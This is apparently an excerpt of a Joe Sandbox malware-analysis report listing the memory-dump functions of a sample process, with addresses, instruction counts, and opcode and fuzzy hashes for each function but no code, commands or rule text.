                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 54e832da99702044a706cc6fb3f9f1ff963ae7d41d46e8fe85f57974396f5f3a
                                                      • Instruction ID: 68b7f8b4059a9cfe8a73b7c73cf49a5cf1b8b9a13a5d060ed3f53c6a248c6829
                                                      • Opcode Fuzzy Hash: 54e832da99702044a706cc6fb3f9f1ff963ae7d41d46e8fe85f57974396f5f3a
                                                      • Instruction Fuzzy Hash: E111EC70D08A198FDB94EB09C894BA973E1FB58315F5441BAD40EE7290CB34AEC5CF85
                                                      Function 00007FF848E60C38 Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 893427cabd90b9adc6bb90f9f073489abb9a61f46fa982472e1b64fda8483e5f
                                                      • Instruction ID: 17694e1a09c135b95e7514d67183e2b7774c3c39c66e6200dfe7267fae4a3ed7
                                                      • Opcode Fuzzy Hash: 893427cabd90b9adc6bb90f9f073489abb9a61f46fa982472e1b64fda8483e5f
                                                      • Instruction Fuzzy Hash: D611E135A0D7999FE702FB38C4402DC7FB0FF82360F5544B6C080EB292D63826498784
                                                      Function 00007FF848E97180 Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 070aff2842b219d20710d49355332a30556335885e1bc23de92677ed733dbae0
                                                      • Instruction ID: 20a97ef6c514553b9f7ebbb0fead66c4ceaa6566b3ab7ba7e4282ef7dcf82485
                                                      • Opcode Fuzzy Hash: 070aff2842b219d20710d49355332a30556335885e1bc23de92677ed733dbae0
                                                      • Instruction Fuzzy Hash: 28012B55D8EA523DD70D7678B8550F87B90DF0223DF0C91B7D08C890A3DE0C54888798
                                                      Function 00007FF848E9D67A Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dbe40029e21e7ff6ffe6b89bdadc6b19536a39dd592f84aee2769de6e854a76d
                                                      • Instruction ID: 2bed45db25bb2dd98722203294c6627de9d4ecf2b2f52a3372c6e4f2b4784242
                                                      • Opcode Fuzzy Hash: dbe40029e21e7ff6ffe6b89bdadc6b19536a39dd592f84aee2769de6e854a76d
                                                      • Instruction Fuzzy Hash: 7A017532F089198FEB54EA98D4807F877A1FB98394F054031D11DD7182DB79A8858758
                                                      Function 00007FF848E60C40 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 51579a85f28c57a4665a358867c34d433bbd809ec7e43d2ccd29de3fdc2ef011
                                                      • Instruction ID: da91f375dc5599344ca1df00f15f25292241926f59e6661ae6487aab0bb471cd
                                                      • Opcode Fuzzy Hash: 51579a85f28c57a4665a358867c34d433bbd809ec7e43d2ccd29de3fdc2ef011
                                                      • Instruction Fuzzy Hash: 5D018C35A0D7999FE702FB28C4442DDBFB0FF42360F5545B6C080EB292DA386A498B84
                                                      Function 00007FF848E744B1 Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e70000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 29a598c12b0ad6440d483ebdc65bc084794b08604eb2785d2b2fceff1e46938f
                                                      • Instruction ID: dd01ee92180bff2e5874e42875fdcc9f89b96b25fcd15fd5d170a9757a2e9270
                                                      • Opcode Fuzzy Hash: 29a598c12b0ad6440d483ebdc65bc084794b08604eb2785d2b2fceff1e46938f
                                                      • Instruction Fuzzy Hash: FCF04C31D0C5C60FE722B62484142B937D1BFA2354F1902BBC04EC71D3EE3C69068355
                                                      Function 00007FF848E7833C Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e70000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d95ede471e773f3709997308655a7f9296c32012535cab7f85f0083d39a4117d
                                                      • Instruction ID: 7b904af2e651053d2cc6df74c7a33c2795cc66871a2b4aad9fe889832b6d631b
                                                      • Opcode Fuzzy Hash: d95ede471e773f3709997308655a7f9296c32012535cab7f85f0083d39a4117d
                                                      • Instruction Fuzzy Hash: E301AD21E0C85A8FFA94FA188455AB83391FFA9340F2441F6D80DE72C6DF387D428B84
                                                      Function 00007FF848E60C48 Relevance: .0, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c707df45b09e2ea01fecd6e8552cff513fe671ba12c746fc173e8b05b00d0663
                                                      • Instruction ID: 350b085cc9f45d6b72126a22592a5e4c0f9cb2c449459990c362e321c0736669
                                                      • Opcode Fuzzy Hash: c707df45b09e2ea01fecd6e8552cff513fe671ba12c746fc173e8b05b00d0663
                                                      • Instruction Fuzzy Hash: 5E017C7190D7899FE702EB78C8442DDBFB0FF42354F5541E6D040EB292DA386A49C781
                                                      Function 00007FF848E64F0E Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f6aa66b55be682265b75d850702e55d32b11dcd17a62512da60fc936cb6555c1
                                                      • Instruction ID: 778d51a47c18cd78dba31e4ed60b48df4928367fe79a9a85df880bb6a208c2a1
                                                      • Opcode Fuzzy Hash: f6aa66b55be682265b75d850702e55d32b11dcd17a62512da60fc936cb6555c1
                                                      • Instruction Fuzzy Hash: 6B018F31E0D5668FEBA2BA28845467867A0FFA4360F9401FAC40EF3296DF397D418785
                                                      Function 00007FF848E9B0D2 Relevance: .0, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ef1562cc6d7cab6545a918a6771a911b13975ae28c32c2acc098c1b6b901dbf2
                                                      • Instruction ID: b0f1f927fa33c69a989d517a7228b50ecaea3bd0860f546e7a3aa828473d9fb3
                                                      • Opcode Fuzzy Hash: ef1562cc6d7cab6545a918a6771a911b13975ae28c32c2acc098c1b6b901dbf2
                                                      • Instruction Fuzzy Hash: B5F06D20E0D94A8FE685F76940993B9BAD1FF99748F5400B6C40CC3293DF7868C5870A
                                                      Function 00007FF848E9AD59 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a9f33fe6cbb12aba266e521e513ca83560dfd035d417fd01baa8a55f56058dee
                                                      • Instruction ID: 6143e93645d54ca7bcd398063c426f1bb13e5548f075ae2fb87ffdba801275dd
                                                      • Opcode Fuzzy Hash: a9f33fe6cbb12aba266e521e513ca83560dfd035d417fd01baa8a55f56058dee
                                                      • Instruction Fuzzy Hash: A7F0EC31B0CBC44FC729553D54550617FF1DB5B51634903EFC096C76A3DD54AC868341
                                                      Function 00007FF848E60C50 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 263c9350f97df9560db6524a3598f21c7de07077fee9492285f3d46b86aa2b8d
                                                      • Instruction ID: 749c64cad18296a47163326118c96fe490b8c7d4c55f43bf3d6bb18a1a2a4088
                                                      • Opcode Fuzzy Hash: 263c9350f97df9560db6524a3598f21c7de07077fee9492285f3d46b86aa2b8d
                                                      • Instruction Fuzzy Hash: 83014B7090D7899FE702EB6484842DDBFF0FF02354F5441E6D440EB292DA386A48C745
                                                      Function 00007FF848E73FBF Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e70000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bb503927ee25c9c95812c660ef24ed56e3eedf926c3958994b1a18ad219e0252
                                                      • Instruction ID: 340d6775db0a3db11437f8bf3d0aa35b8d56e3929cff692943547f9cece9bd92
                                                      • Opcode Fuzzy Hash: bb503927ee25c9c95812c660ef24ed56e3eedf926c3958994b1a18ad219e0252
                                                      • Instruction Fuzzy Hash: E1F04970E0890F8FEB98EA4CC8556FE77B0FB54351F00063AC016D3284EF7869418B84
                                                      Function 00007FF848E62B3D Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction ID: 1eefac10af07d2f6764c7d5310106f9e712c5777091c62acccfbc6035f594056
                                                      • Opcode Fuzzy Hash: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction Fuzzy Hash: A9F0E13094C85E8EEBB4FA14C8456E873A2FB91391F9446B5D40DF31A2DFB879818B48
                                                      Function 00007FF848E60B77 Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 77c885b3911e8bb667b258dc5efa66b8eef583e82c812ca42ca0f707244bfcc4
                                                      • Instruction ID: 47d914266f96cfb6da44dd35075882d88eb662c4aea8b793287e59a9cc795dae
                                                      • Opcode Fuzzy Hash: 77c885b3911e8bb667b258dc5efa66b8eef583e82c812ca42ca0f707244bfcc4
                                                      • Instruction Fuzzy Hash: 1CF0E53925EA85DFD742AB3DC8A58D4BF60FF03104F9A01EAD089CB963C315685DCB41
                                                      Function 00007FF848E747C4 Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e70000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b1f6850ea463fbd98618da56179b592f4e9e7f7347a8285fffb6543d260b0736
                                                      • Instruction ID: 66eb19dda980de2539f7eeb938ae82c16127b13bfe86e8d1e042379045c94a82
                                                      • Opcode Fuzzy Hash: b1f6850ea463fbd98618da56179b592f4e9e7f7347a8285fffb6543d260b0736
                                                      • Instruction Fuzzy Hash: 24F03A30E1C5468EFA58BA1894806B93291FF54794F114575D85A932C7EF38A8524688
                                                      Function 00007FF848E79302 Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e70000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a2c5ea5f636c987af263b5fdadf485b1e4b37b9572e46316133d7d0a7c0d2da8
                                                      • Instruction ID: a83428b990fd2e542995a4f4cf24e85f3fd32e66ef46288f28e9d3cdadcad013
                                                      • Opcode Fuzzy Hash: a2c5ea5f636c987af263b5fdadf485b1e4b37b9572e46316133d7d0a7c0d2da8
                                                      • Instruction Fuzzy Hash: 7DE01531A189098FEB94FB68D4456EC73A1FF49250F5400B6D00ED7292CA35A8118B44
                                                      Function 00007FF848E93459 Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 97f9cefa6724043385a380c204e3bf859677991a0d0975ec2fc455f9ae180146
                                                      • Instruction ID: 1cb5ddb4e150951ad8ec1e1b42a13cb8b96e67d87835a2c8291b5281b30c714f
                                                      • Opcode Fuzzy Hash: 97f9cefa6724043385a380c204e3bf859677991a0d0975ec2fc455f9ae180146
                                                      • Instruction Fuzzy Hash: 52E09220709BC84FC70EA6384868560BFF1EB6711178902DBC045CB2A3D919DC89C751
                                                      Function 00007FF848E9A8E9 Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f5587506607e5dc9eb59e78b2e127a7dcac5e062c9c7fbe92f42c1bfb5141e76
                                                      • Instruction ID: 7e3361eed1f5e917689d6ebe4feababae252d6803e662a37caff99b8361c71d9
                                                      • Opcode Fuzzy Hash: f5587506607e5dc9eb59e78b2e127a7dcac5e062c9c7fbe92f42c1bfb5141e76
                                                      • Instruction Fuzzy Hash: 08E09230609B844FC70AA6288869520BBA1EF6710178A42EBC005CB1A3DA19DC88C741
                                                      Function 00007FF848E9A859 Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7b136de9c4465a74ecae7d2a0b8f5d324c7a29daa162e4e8b69b99a9edac0b1f
                                                      • Instruction ID: bd8b58859d4076fb609418eb0e9cef636a281979e56b0bc043ec5559406b2354
                                                      • Opcode Fuzzy Hash: 7b136de9c4465a74ecae7d2a0b8f5d324c7a29daa162e4e8b69b99a9edac0b1f
                                                      • Instruction Fuzzy Hash: 64E09230609B844FC70AA6288869520BBF1EF6A10178A42EBC005CB1A3DA19DC89C741
                                                      Function 00007FF848E97C44 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 41b843d69ce4f94b581e4b1f3b2a638292c722eff2822de5ab3fa66263af7517
                                                      • Instruction ID: 3b790c5fedc380422d55cfe9582ec60f94e04ec5b7558383d10eaca055c29755
                                                      • Opcode Fuzzy Hash: 41b843d69ce4f94b581e4b1f3b2a638292c722eff2822de5ab3fa66263af7517
                                                      • Instruction Fuzzy Hash: 80E04F34A8E7C04FC70AA73888A58943FB0EF57211B4A80EBD045CB1B3D62D9C4EC752
                                                      Function 00007FF848E75178 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e70000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 47cbcdc54ea2d82ff77161c0754e1444da161be50743cd5490d6412486fd817f
                                                      • Instruction ID: f0eaa999ca639210b5d73d02576f434c97bcc5544c67bc28b3caa325ed600902
                                                      • Opcode Fuzzy Hash: 47cbcdc54ea2d82ff77161c0754e1444da161be50743cd5490d6412486fd817f
                                                      • Instruction Fuzzy Hash: 02D05E30B6090D4B8B0CB62D8458434B3D1F7AA2167D452B9940BC3281ED25ECC68B84
                                                      Function 00007FF848E9D969 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e60a0f03738a7b0cc9e90fe60c45b8f9dc10e66583eb3621be1f16522b54ee65
                                                      • Instruction ID: 315b248e4b6228ec9ad315496e7f88821b5a010a995358705c2715075673ab8d
                                                      • Opcode Fuzzy Hash: e60a0f03738a7b0cc9e90fe60c45b8f9dc10e66583eb3621be1f16522b54ee65
                                                      • Instruction Fuzzy Hash: EDE0863164A7804FC30956288C698543BB1DF67111B5641DAC045CF673D61EDC89C701
                                                      Function 00007FF848E9D8E9 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8d083797cc4c37f643a7e6df7e863d89c9124def3c79d8af5b12689d34e08bd9
                                                      • Instruction ID: 7c3d38eaf0a35be235a7287bcf9d0aab9b34bd2ebfd2bcbf713ab54be9d6b698
                                                      • Opcode Fuzzy Hash: 8d083797cc4c37f643a7e6df7e863d89c9124def3c79d8af5b12689d34e08bd9
                                                      • Instruction Fuzzy Hash: 79E04F3164A7804FC30A56288C698543BB19F67111B5A41DAC045CF6B3D61ADC88C702
                                                      Function 00007FF848E73A10 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e70000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                      • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                      • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                      • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                      Function 00007FF848E9A900 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                      Function 00007FF848E9A870 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                      Function 00007FF848E63824 Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction ID: 0ebb8008c8aa52596a5baca2a055c8ed622b73bcf0a29714cd5fd3f58db3e768
                                                      • Opcode Fuzzy Hash: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction Fuzzy Hash: B0E01224D0C11A4FF755F614C8517BD6261BF94340F5400B4D52DB36D2CF787D804749
                                                      Function 00007FF848E9D029 Relevance: .0, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2bf13e036f4edc9b53d0d0af8e3e61debb82d912effd663b3793d36e5be8d87e
                                                      • Instruction ID: fd5e002d15d490e9fc1417daa2cbb9a4321dfeb680e7be21b7b08ebdf7e14038
                                                      • Opcode Fuzzy Hash: 2bf13e036f4edc9b53d0d0af8e3e61debb82d912effd663b3793d36e5be8d87e
                                                      • Instruction Fuzzy Hash: 59E0123150A7854FC30A9B28C8A99547FB0EF27211B9701D7C005CF573D61DDC99C751
                                                      Function 00007FF848E92290 Relevance: .0, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                      Function 00007FF848E971D0 Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                      • Instruction ID: 604417b3b3542cd8c60929ed4a2d5b0b4ca1cb7ae624cf3b0c4c760a0363f089
                                                      • Opcode Fuzzy Hash: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
